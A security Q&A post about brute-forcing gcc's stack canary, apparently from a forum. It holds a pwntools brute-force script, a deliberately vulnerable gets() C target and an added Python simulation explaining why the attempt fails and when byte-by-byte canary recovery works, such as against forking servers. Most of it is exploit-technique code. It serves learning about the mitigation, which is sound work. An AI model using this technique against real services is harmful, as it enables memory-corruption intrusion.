
How to bruteforce the stack canary


gcc implemented a stack protector to protect programs from buffer overflows. I want to know if it's possible (and if it is, how) to exploit this and run a buffer overflow. I created a simple Python script that should bruteforce the canary:

from pwn import *

canary = b""


def brute():
    """Append one byte to the known prefix: a guess that does not trigger
    the stack-smashing abort is taken to be the next canary byte."""
    global canary
    for byte in range(256):                      # test 0x00..0xff inclusive
        p = process("./vuln")                    # fresh process for every attempt
        p.sendline(b"A" * 64 + canary + bytes([byte]))
        reply = p.recvall()                      # process() merges stderr into stdout
        if b"***" not in reply:                  # no "*** stack smashing detected ***"
            canary += bytes([byte])
            return
    raise RuntimeError("no guess accepted at position %d" % len(canary))


for _ in range(4):
    brute()
print("Canary: " + "".join("\\x{:02x}".format(c) for c in canary))

The result was: Canary: \x0a\x00\x00\x00, and that's obviously not the canary.
The binary I used to hack:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

/* Deliberately vulnerable target from the question: gets() has no bound,
 * so more than 64 bytes of input overwrite whatever sits above buffer,
 * including the canary that gcc's stack protector placed there. */
int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);              /* the overflow: reads up to the newline, appends a NUL */

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
  return 0;
}
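Added example (not code from the question): a model of the posted target's stack frame together with a byte-by-byte canary brute force, showing under which conditions the attack works and what the script above actually measures. Everything in it is assumed rather than stated on the page: Linux x86-64 glibc with an 8-byte canary whose lowest byte is 0x00, the 64-byte buffer sitting directly below the canary, a constructed fixed canary value standing in for a forking server (forked children inherit the parent's stack guard), and a hypothetical read()-based variant of the binary. The names target_gets, target_read, target_fresh, sendline_gets, brute_canary and attack_is_reliable are invented here.

```python
import random

# Added example, not code from the question. Models the posted target's frame
# and runs the byte-by-byte brute force against three variants of it.
#
# Assumptions (not on the page): Linux x86-64 glibc, 8-byte canary with a
# zero low byte; the 64-byte buffer lies directly below the canary; the
# "fixed" variants stand in for a forking server where every connection
# sees the same canary.

BUF_LEN = 64
CANARY_LEN = 8
SMASH_MSG = b"*** stack smashing detected ***: terminated\n"   # glibc abort text
OK_MSG = b"Try again?\n"

# Constructed canary for the model: low byte zero like glibc, no 0x0a byte.
CANARY = b"\x00\x51\xc3\xa7\x1e\x9b\x42\xd6"


def frame_check(data, canary):
    """Bytes past BUF_LEN land on the canary; a mismatch is what
    __stack_chk_fail reports when the function returns."""
    overflow = data[BUF_LEN:BUF_LEN + len(canary)]
    return OK_MSG if canary[:len(overflow)] == overflow else SMASH_MSG


def target_gets(line, canary=CANARY):
    """Model of the posted binary: gets() keeps input up to the first '\\n'
    and always appends a NUL, so one extra 0x00 follows whatever was sent."""
    return frame_check(line.split(b"\n", 1)[0] + b"\x00", canary)


def target_read(payload, canary=CANARY):
    """Hypothetical variant that reads with read(0, buffer, n): raw bytes,
    no terminator. Not the posted code; shows what the attack needs."""
    return frame_check(payload, canary)


def sendline_gets(payload):
    """pwntools sendline() appends '\\n'; this is what the gets() model sees."""
    return target_gets(payload + b"\n")


_rng = random.Random(1234)   # seeded so the example is reproducible


def fresh_canary():
    """Model of process('./vuln') per attempt: a new random canary each time."""
    return b"\x00" + bytes(_rng.getrandbits(8) for _ in range(CANARY_LEN - 1))


def target_fresh(payload):
    return target_read(payload, canary=fresh_canary())


def brute_canary(send, canary_len=CANARY_LEN, skip=()):
    """Recover the canary one byte at a time: a guess that does not trigger
    the abort is kept, so the cost is at most 256 * canary_len attempts
    instead of 256 ** canary_len. Returns (bytes found, complete, attempts)."""
    known, attempts = b"", 0
    for _ in range(canary_len):
        for guess in range(256):
            if guess in skip:
                continue
            attempts += 1
            reply = send(b"A" * BUF_LEN + known + bytes([guess]))
            if SMASH_MSG not in reply:
                known += bytes([guess])
                break
        else:
            return known, False, attempts     # no guess survived this position
    return known, True, attempts


def attack_is_reliable(send, canary_len=CANARY_LEN):
    """A usable oracle gives the same complete answer on every run; a target
    that re-randomises the canary between attempts cannot."""
    a = brute_canary(send, canary_len)
    b = brute_canary(send, canary_len)
    return a[1] and b[1] and a[0] == b[0]


if __name__ == "__main__":
    print("read()-style forking target :", brute_canary(target_read))
    print("gets() + sendline, as posted:", brute_canary(sendline_gets, 4))
    print("gets(), never sending 0x0a  :", brute_canary(sendline_gets, skip=(0x0a,)))
    print("fresh canary per attempt    :", attack_is_reliable(target_fresh))
```

Against the read()-style fixed-canary target the loop recovers all 8 bytes in 916 attempts instead of up to 2^64. Against the gets() model fed through sendline() it returns exactly the \x0a\x00\x00\x00 the question reports: a guess of 0x0a is a newline, gets() stops there, nothing past the buffer is written, and every later guess is accepted for the same reason because the 0x0a already in the prefix truncates the line. Never sending 0x0a does not help either, because gets() appends a NUL after the guessed byte and that NUL clobbers the next canary byte, so no single-byte guess can survive; byte-at-a-time brute force needs an input routine without a terminator. With a fresh process per attempt the canary is re-randomised every time, so two runs of the same attack do not even agree with each other. Against a real forking service, check the child's exit status (SIGABRT) rather than grepping output: glibc writes the message to stderr and, in older versions, to /dev/tty unless LIBC_FATAL_STDERR_=1 is set.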

